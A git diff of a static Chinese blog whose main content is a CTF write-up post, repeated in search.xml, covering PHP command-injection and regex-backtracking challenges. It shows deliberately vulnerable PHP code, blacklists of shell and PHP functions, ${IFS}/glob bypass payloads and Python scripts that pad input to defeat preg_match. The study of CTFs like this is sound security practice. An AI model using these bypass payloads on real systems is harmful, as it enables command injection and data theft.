diff --git a/2023/10/24/hello-world/index.html b/2023/10/24/hello-world/index.html
index 94b5b4b..751e0fe 100644
--- a/2023/10/24/hello-world/index.html
+++ b/2023/10/24/hello-world/index.html
@@ -1094,7 +1094,7 @@

你的赏识是我前进的动力


  站点总字数: 404 + class="white-color">405
diff --git a/2023/10/24/test/index.html b/2023/10/24/test/index.html
index 3f80575..2826ff7 100644
--- a/2023/10/24/test/index.html
+++ b/2023/10/24/test/index.html
@@ -401,7 +401,7 @@

test

文章字数:   - 331 + 332
@@ -445,6 +445,7 @@

PHP] strpos stripos strrpos strripos的区别-CSDN博客

+

123

@@ -1097,7 +1098,7 @@

你的赏识是我前进的动力


  站点总字数: 404 + class="white-color">405
diff --git a/404.html b/404.html
index 6b3189b..a17e465 100644
--- a/404.html
+++ b/404.html
@@ -454,7 +454,7 @@
  站点总字数: 404 + class="white-color">405
diff --git a/archives/2023/10/index.html b/archives/2023/10/index.html
index 20f02b1..9c751f8 100644
--- a/archives/2023/10/index.html
+++ b/archives/2023/10/index.html
@@ -682,7 +682,7 @@
  站点总字数: 404 + class="white-color">405
diff --git a/archives/2023/index.html b/archives/2023/index.html
index 912b80d..e0ef603 100644
--- a/archives/2023/index.html
+++ b/archives/2023/index.html
@@ -682,7 +682,7 @@
  站点总字数: 404 + class="white-color">405
diff --git a/archives/index.html b/archives/index.html
index c2f79d2..93b4265 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -682,7 +682,7 @@
  站点总字数: 404 + class="white-color">405 diff --git a/atom.xml b/atom.xml index a4b444e..164823c 100644 --- a/atom.xml +++ b/atom.xml @@ -6,7 +6,7 @@ - 2023-10-29T04:28:17.636Z + 2023-10-29T06:32:34.600Z https://harmor123.github.io/harmor.github.io/ @@ -21,7 +21,7 @@ https://harmor123.github.io/harmor.github.io/2023/10/24/test/ 2023-10-24T12:25:59.000Z - 2023-10-29T04:28:17.636Z + 2023-10-29T06:32:34.600Z diff --git a/index.html b/index.html index c0a6a42..51f3456 100644 --- a/index.html +++ b/index.html @@ -754,7 +754,7 @@
  站点总字数: 404 + class="white-color">405 diff --git a/search.xml b/search.xml index 9ce8064..5a863df 100644 --- a/search.xml +++ b/search.xml @@ -8,7 +8,7 @@ /harmor.github.io/2023/10/24/test/ - 1.ez_rce
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}

1
2
3
4
5
6
7
8
9
10
11
?rce=ls  #有flag.php
?rce=cp${IFS}fla?.php${IFS}a.txt

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
} #假的flag

?rce=ls${IFS}/ #有flag
?rce=cp${IFS}/fla?${IFS}a.php #然后url/a.php 可得flag

2.ez_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
$code = (String)$_POST['c_ode'];
$num=$_GET['num'];
if(preg_match("/[0-9]/", $num))
{
die("no number!");
}
elseif(intval($num))
{
if(preg_match('/.+?SHCTF/is', $code))
{
die('no touch!');
}
if(stripos($code,'2023SHCTF') === FALSE)
{
die('what do you want');
}
echo $flag;
}
}

PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN

回溯法绕过正则匹配

1
2
3
4
5
6
7
import requests
url="http://112.6.51.212:31842/?num[]=1"
data={
'c[ode':'a'*1000000+'2023SHCTF'
}
r=requests.post(url,data=data)
print(r.text)

本题与下面一道题进行对比:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

$as=$_POST['as'];
$code = $_POST['code'];

function process($code){
return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code);
}

if(!is_array($as)){

if(!preg_match_all('/but.*how/is',$as)){

if(strpos($as,'but how')!==false){

system(process($code));

}else{
die('tip: backup file there');
}

}else{
die('NO there');
}
}
?>
1
2
3
4
5
6
7
8
import requests
url=""
data={
'as':'but how'+'a'*1000000,
'code':'sort /flflagag'
}
r=requests.post(url,data=data)
print(r.text)

正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。

[PHP] strpos stripos strrpos strripos的区别-CSDN博客

]]>
+ 1.ez_rce
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}

1
2
3
4
5
6
7
8
9
10
11
?rce=ls  #有flag.php
?rce=cp${IFS}fla?.php${IFS}a.txt

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
} #假的flag

?rce=ls${IFS}/ #有flag
?rce=cp${IFS}/fla?${IFS}a.php #然后url/a.php 可得flag

2.ez_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
$code = (String)$_POST['c_ode'];
$num=$_GET['num'];
if(preg_match("/[0-9]/", $num))
{
die("no number!");
}
elseif(intval($num))
{
if(preg_match('/.+?SHCTF/is', $code))
{
die('no touch!');
}
if(stripos($code,'2023SHCTF') === FALSE)
{
die('what do you want');
}
echo $flag;
}
}

PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN

回溯法绕过正则匹配

1
2
3
4
5
6
7
import requests
url="http://112.6.51.212:31842/?num[]=1"
data={
'c[ode':'a'*1000000+'2023SHCTF'
}
r=requests.post(url,data=data)
print(r.text)

本题与下面一道题进行对比:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

$as=$_POST['as'];
$code = $_POST['code'];

function process($code){
return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code);
}

if(!is_array($as)){

if(!preg_match_all('/but.*how/is',$as)){

if(strpos($as,'but how')!==false){

system(process($code));

}else{
die('tip: backup file there');
}

}else{
die('NO there');
}
}
?>
1
2
3
4
5
6
7
8
import requests
url=""
data={
'as':'but how'+'a'*1000000,
'code':'sort /flflagag'
}
r=requests.post(url,data=data)
print(r.text)

正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。

[PHP] strpos stripos strrpos strripos的区别-CSDN博客

123

]]>